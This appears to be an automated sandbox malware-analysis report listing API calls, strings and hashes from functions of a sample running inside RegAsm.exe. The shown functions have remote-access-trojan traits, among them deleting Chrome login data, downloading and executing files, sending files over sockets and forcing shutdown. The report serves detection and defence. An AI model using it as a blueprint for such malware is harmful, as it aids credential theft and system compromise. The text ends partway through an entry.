                                  Function 004167EF Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 97libraryloadershutdownCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0041798D: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                    • Part of subcall function 0041798D: OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                    • Part of subcall function 0041798D: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                    • Part of subcall function 0041798D: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                    • Part of subcall function 0041798D: GetLastError.KERNEL32 ref: 004179D8
                                  • ExitWindowsEx.USER32(00000000,00000001), ref: 00416891
                                  • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 004168A6
                                  • GetProcAddress.KERNEL32(00000000), ref: 004168AD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                  • String ID: !D@$PowrProf.dll$SetSuspendState
                                  • API String ID: 1589313981-2876530381
                                  • Opcode ID: ee499d4d47afde6cc3500bc760edfd9f3d73b5503f1d67301f657f5df503f6e6
                                  • Instruction ID: 272f3f60014ab8f8f2fa2781f50e1ac7d9ab3f628c5d0f86ef79d7992e461550
                                  • Opcode Fuzzy Hash: ee499d4d47afde6cc3500bc760edfd9f3d73b5503f1d67301f657f5df503f6e6
                                  • Instruction Fuzzy Hash: D821B17060430166CA14FBB28856ABF36599F41388F41087FB501671D2EF3DD845C76E
                                  Function 0041B411 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69networkfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B438
                                  • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B44E
                                  • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B467
                                  • InternetCloseHandle.WININET(00000000), ref: 0041B4AD
                                  • InternetCloseHandle.WININET(00000000), ref: 0041B4B0
                                  Strings
                                  • http://geoplugin.net/json.gp, xrefs: 0041B448
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseHandleOpen$FileRead
                                  • String ID: http://geoplugin.net/json.gp
                                  • API String ID: 3121278467-91888290
                                  • Opcode ID: 57dbabaecf7d387fca1fccaaf918aea223ffbee7dad3a19db74472bdfd73447a
                                  • Instruction ID: e320c318363c88f1c040182635621d8729538b68a2f0080144892bf513bd3cc2
                                  • Opcode Fuzzy Hash: 57dbabaecf7d387fca1fccaaf918aea223ffbee7dad3a19db74472bdfd73447a
                                  • Instruction Fuzzy Hash: 011198311053126BD224AB269C49EBF7F9CEF86765F10043EF945A2282DB689C44C6FA
                                  Function 0040BA4D Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA89
                                  • GetLastError.KERNEL32 ref: 0040BA93
                                  Strings
                                  • UserProfile, xrefs: 0040BA59
                                  • [Chrome StoredLogins found, cleared!], xrefs: 0040BAB9
                                  • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA54
                                  • [Chrome StoredLogins not found], xrefs: 0040BAAD
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: DeleteErrorFileLast
                                  • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                  • API String ID: 2018770650-1062637481
                                  • Opcode ID: d6312413c91956911aeebdf781d371ca6745e6f6be180b60b08b021ffbe32e09
                                  • Instruction ID: 0532e36a1aab116e50a9f1d1704ee325f44086adb43c50cfffb7bf5285f9a594
                                  • Opcode Fuzzy Hash: d6312413c91956911aeebdf781d371ca6745e6f6be180b60b08b021ffbe32e09
                                  • Instruction Fuzzy Hash: 76018F61A402056ACB04B7B6DC5B9BE7724A921704B50057FF806722D2FE7D49098BDE
                                  Function 0041798D Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                  • OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                  • GetLastError.KERNEL32 ref: 004179D8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                  • String ID: SeShutdownPrivilege
                                  • API String ID: 3534403312-3733053543
                                  • Opcode ID: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                  • Instruction ID: 35ac2027e355ce869dd6e937a138cd84cb59798e299a7bc9dfe05b1c572390d3
                                  • Opcode Fuzzy Hash: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                  • Instruction Fuzzy Hash: 38F03A71802229FBDB10ABA1EC4DAEF7FBCEF05612F100465B909A1152D7348E04CBB5
                                  Function 0040928E Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • __EH_prolog.LIBCMT ref: 00409293
                                    • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040932F
                                  • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040938D
                                  • FindNextFileW.KERNEL32(00000000,?), ref: 004093E5
                                  • FindClose.KERNEL32(00000000), ref: 004093FC
                                    • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00474EF8,PkGNG,00000000,00474EF8,00404CA8,00000000,?,?,?,00474EF8,?), ref: 00404E38
                                    • Part of subcall function 00404E26: SetEvent.KERNEL32(?), ref: 00404E43
                                    • Part of subcall function 00404E26: CloseHandle.KERNEL32(?), ref: 00404E4C
                                  • FindClose.KERNEL32(00000000), ref: 004095F4
                                    • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,00401A45,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000), ref: 00404B47
                                    • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000,?,?,?,?,?,00401A45), ref: 00404B75
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                  • String ID:
                                  • API String ID: 1824512719-0
                                  • Opcode ID: a810edf30761c72987c4cb58374515ca85b7de027ac2e2c904d565530509331a
                                  • Instruction ID: 89df7f8b75d3b77417eb58d09b4f39b7dfb13bde992cfd9524fc7595df83f5be
                                  • Opcode Fuzzy Hash: a810edf30761c72987c4cb58374515ca85b7de027ac2e2c904d565530509331a
                                  • Instruction Fuzzy Hash: 34B19D32900109AACB14EBA1DD92AEDB379AF44314F50417FF506B60E2EF785F49CB59
                                  Function 00446270 Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 464COMMONLIBRARYCODE
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: FSE$FSE$PkGNG
                                  • API String ID: 0-1266307253
                                  • Opcode ID: 321144b451aceacc10be44255a5eb5313de52b8189587c3c0fdae4375c3dd106
                                  • Instruction ID: f88ef0336175cd1615890b4a552d96ffb4623b3c947145a2eaf1ae153763923c
                                  • Opcode Fuzzy Hash: 321144b451aceacc10be44255a5eb5313de52b8189587c3c0fdae4375c3dd106
                                  • Instruction Fuzzy Hash: AA025D71E002199BEF14CFA9D8806AEFBF1FF49314F26816AD819E7384D734AD418B85
                                  Function 0041AADB Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                                  Download Yara Rule
                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A731,00000000), ref: 0041AAE4
                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A731,00000000), ref: 0041AAF9
                                  • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB06
                                  • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A731,00000000), ref: 0041AB11
                                  • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB23
                                  • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB26
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Service$CloseHandle$Open$ManagerStart
                                  • String ID:
                                  • API String ID: 276877138-0
                                  • Opcode ID: 9428b136f56b7ac5d2013585799c428180de648bb4d6702bc273cde58ba3a705
                                  • Instruction ID: 14dbf03deabb1432b93a26d2ddf90514dbbc411f15d31c7908333a88c2a5d316
                                  • Opcode Fuzzy Hash: 9428b136f56b7ac5d2013585799c428180de648bb4d6702bc273cde58ba3a705
                                  • Instruction Fuzzy Hash: FEF0E971141225AFD2115B209C88DFF276CDF85B66B00082AF901921919B68CC45E579
                                  Function 0040F7E2 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88sleepCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00413584: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,00000000), ref: 004135A4
                                    • Part of subcall function 00413584: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 004135C2
                                    • Part of subcall function 00413584: RegCloseKey.ADVAPI32(00000000), ref: 004135CD
                                  • Sleep.KERNEL32(00000BB8), ref: 0040F896
                                  • ExitProcess.KERNEL32 ref: 0040F905
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseExitOpenProcessQuerySleepValue
                                  • String ID: 5.1.2 Pro$override$pth_unenc
                                  • API String ID: 2281282204-3554326054
                                  • Opcode ID: 0a9b0b8e18e6e63923395880d3987700b8c960eca4e781d2f00c21a7a482b044
                                  • Instruction ID: d275b5d15c9ff05a0ec0da3c9587874d7690dc7fa5d0ec02d6e8a4ede61593ab
                                  • Opcode Fuzzy Hash: 0a9b0b8e18e6e63923395880d3987700b8c960eca4e781d2f00c21a7a482b044
                                  • Instruction Fuzzy Hash: 5921E171B0420127D6087676885B6AE399A9B80708F50453FF409672D7FF7C8E0483AF
                                  Function 004524BC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 00452555
                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 0045257E
                                  • GetACP.KERNEL32(?,?,004527DB,?,00000000), ref: 00452593
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InfoLocale
                                  • String ID: ACP$OCP
                                  • API String ID: 2299586839-711371036
                                  • Opcode ID: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                  • Instruction ID: 097c3b5166b2d36aca1cb621bb06e922528e2ea4561953c90108b9915aa2a338
                                  • Opcode Fuzzy Hash: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                  • Instruction Fuzzy Hash: 7E21F932600108B6D734CF14CA10A9B73A6EB16B53B564467ED09D7312F7B6DD44C398
                                  Function 0041B539 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                  Download Yara Rule
                                  APIs
                                  • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B54A
                                  • LoadResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B55E
                                  • LockResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B565
                                  • SizeofResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B574
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Resource$FindLoadLockSizeof
                                  • String ID: SETTINGS
                                  • API String ID: 3473537107-594951305
                                  • Opcode ID: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                  • Instruction ID: d04f7a3eece584ab18b37ce022e38df3785cd6d6757b7dd0dc659012c7d5cbc3
                                  • Opcode Fuzzy Hash: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                  • Instruction Fuzzy Hash: 8EE01A76600B22EBEB211BB1AC4CD863E29F7C97637140075F90586231CB798840DA98
                                  Function 004096A0 Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • __EH_prolog.LIBCMT ref: 004096A5
                                  • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040971D
                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00409746
                                  • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040975D
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstH_prologNext
                                  • String ID:
                                  • API String ID: 1157919129-0
                                  • Opcode ID: dd0421224294bb62472ab89505622d6763c67607e6c73e6d1c5958e8fabc376b
                                  • Instruction ID: 8e52766585a78a9bd0f7e398a9017c7fe376444e683812dd136b20495b515571
                                  • Opcode Fuzzy Hash: dd0421224294bb62472ab89505622d6763c67607e6c73e6d1c5958e8fabc376b
                                  • Instruction Fuzzy Hash: 7F814C328001099BCB15EBA2DC969EDB378AF14318F10417FE506B71E2EF789E49CB58
                                  Function 00408847 Relevance: 7.7, APIs: 5, Instructions: 186fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • __EH_prolog.LIBCMT ref: 0040884C
                                  • FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                  • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A50
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                  • String ID:
                                  • API String ID: 1771804793-0
                                  • Opcode ID: 3108295a3ea490f6f4279643bcf91a98a4e8460a72a47f708dfbc03d5f7be2ca
                                  • Instruction ID: 0d5560aa06bbfb8d15084ed76e809f646cede1ce68103026aeaac9ba950e1e68
                                  • Opcode Fuzzy Hash: 3108295a3ea490f6f4279643bcf91a98a4e8460a72a47f708dfbc03d5f7be2ca
                                  • Instruction Fuzzy Hash: 9D517F72900209AACB04FB65DD569ED7778AF10308F50417FB906B71E2EF389B49CB89
                                  Function 00406EEB Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FF7
                                  • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070DB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: DownloadExecuteFileShell
                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$open
                                  • API String ID: 2825088817-3056885514
                                  • Opcode ID: 7772d264ec74869141b014490c566259b039335beacd565e5cb36fd33a70e94b
                                  • Instruction ID: 89f65c5a2840bfed21b3c91f130df949caec66636536da5e2ea9f2eef63816fc
                                  • Opcode Fuzzy Hash: 7772d264ec74869141b014490c566259b039335beacd565e5cb36fd33a70e94b
                                  • Instruction Fuzzy Hash: 5261B371A0830166CA14FB76C8569BE37A59F81758F40093FB9427B2D3EE3C9905C69B
                                  Function 00407877 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407892
                                  • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040795A
                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileFind$FirstNextsend
                                  • String ID: XPG$XPG
                                  • API String ID: 4113138495-1962359302
                                  • Opcode ID: f1a52394f1a986f7dbfcef978ba307d27b987f60840b982f2ffdd03438d5e8df
                                  • Instruction ID: fedc3c23448d2be437c2d68ef58725aa3c97e5c0e74d328490a6b39f64eed896
                                  • Opcode Fuzzy Hash: f1a52394f1a986f7dbfcef978ba307d27b987f60840b982f2ffdd03438d5e8df
                                  • Instruction Fuzzy Hash: 2D21A4315083015BC714FB61D895CEFB3ACAF90358F40493EF696620E1FF78AA098A5B
                                  Function 0041CA73 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                  Download Yara Rule
                                  APIs
                                  • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                    • Part of subcall function 004137AA: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046612C), ref: 004137B9
                                    • Part of subcall function 004137AA: RegSetValueExA.ADVAPI32(0046612C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CB42,WallpaperStyle,0046612C,00000001,00474EE0,00000000), ref: 004137E1
                                    • Part of subcall function 004137AA: RegCloseKey.ADVAPI32(0046612C,?,?,0041CB42,WallpaperStyle,0046612C,00000001,00474EE0,00000000,?,00408798,00000001), ref: 004137EC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseCreateInfoParametersSystemValue
                                  • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                  • API String ID: 4127273184-3576401099
                                  • Opcode ID: f5c8ef2c27851cf1013244d94d6a0450d36d3a4faca39a9ae70033779c708183
                                  • Instruction ID: 8ac436d711b2fc3476497f69dc57c3b9a547a247a31514f467319d0910454585
                                  • Opcode Fuzzy Hash: f5c8ef2c27851cf1013244d94d6a0450d36d3a4faca39a9ae70033779c708183
                                  • Instruction Fuzzy Hash: D7118472BC425022E81831396D9BFBE28068343F61F54456BF6022A6CAE4CF6A9143CF
                                  Function 00451D58 Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444AF4,?,?,?,?,?,?,00000004), ref: 00451E3A
                                  • _wcschr.LIBVCRUNTIME ref: 00451ECA
                                  • _wcschr.LIBVCRUNTIME ref: 00451ED8
                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00444AF4,00000000,00444C14), ref: 00451F7B
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                  • String ID:
                                  • API String ID: 4212172061-0
                                  • Opcode ID: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                                  • Instruction ID: 2c98265d6c7a89d72caae9d33925a6d6107158c78f730362dcab12f0c71d6669
                                  • Opcode Fuzzy Hash: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                                  • Instruction Fuzzy Hash: 7F611976600606AAD714AB75CC42FBB73A8EF04306F14056FFD05DB292EB78E948C769
                                  Function 0045201B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                  • EnumSystemLocalesW.KERNEL32(00452143,00000001,00000000,?,JD,?,00452770,00000000,?,?,?), ref: 0045208D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                  • String ID: p'E$JD
                                  • API String ID: 1084509184-908320845
                                  • Opcode ID: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                  • Instruction ID: b0e9e6415e7ea3a3ed95e939ef0edb9d062384d4a1a0bde9f31cc9ceae225fa6
                                  • Opcode Fuzzy Hash: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                  • Instruction Fuzzy Hash: 0211553A2007019FDB189F39C9916BBBB92FF8075AB14482EEE4687B41D7B5A946C740
                                  Function 00452143 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448301
                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452197
                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004521E8
                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004522A8
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorInfoLastLocale$_free$_abort
                                  • String ID:
                                  • API String ID: 2829624132-0
                                  • Opcode ID: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                  • Instruction ID: 283aa9570716a6929da4b93cb0bca45b8c77d553a5ebfd19e37a994bad1de6ac
                                  • Opcode Fuzzy Hash: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                  • Instruction Fuzzy Hash: F361A235500207ABDF289F24CE82B7A77A8EF05306F1441BBED05C6656E7BC9D89CB58
                                  Function 0043BB71 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • IsDebuggerPresent.KERNEL32 ref: 0043BC69
                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043BC73
                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC80
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                  • String ID:
                                  • API String ID: 3906539128-0
                                  • Opcode ID: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                  • Instruction ID: 25e88f5a56b9fbea854716c485460a06fbe33a825339a9765be54c88dd7cea35
                                  • Opcode Fuzzy Hash: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                  • Instruction Fuzzy Hash: 0431D374901218ABCB21DF65D9887CDBBB8EF0C311F5051EAE81CA7251EB749F818F48
                                  Function 004338C8 Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,?,00433550,00000034,?,?,00000000), ref: 004338DA
                                  • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,PkGNG,004335E3,?,?,?), ref: 004338F0
                                  • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,PkGNG,004335E3,?,?,?,0041E2E2), ref: 00433902
                                  Memory Dump Source
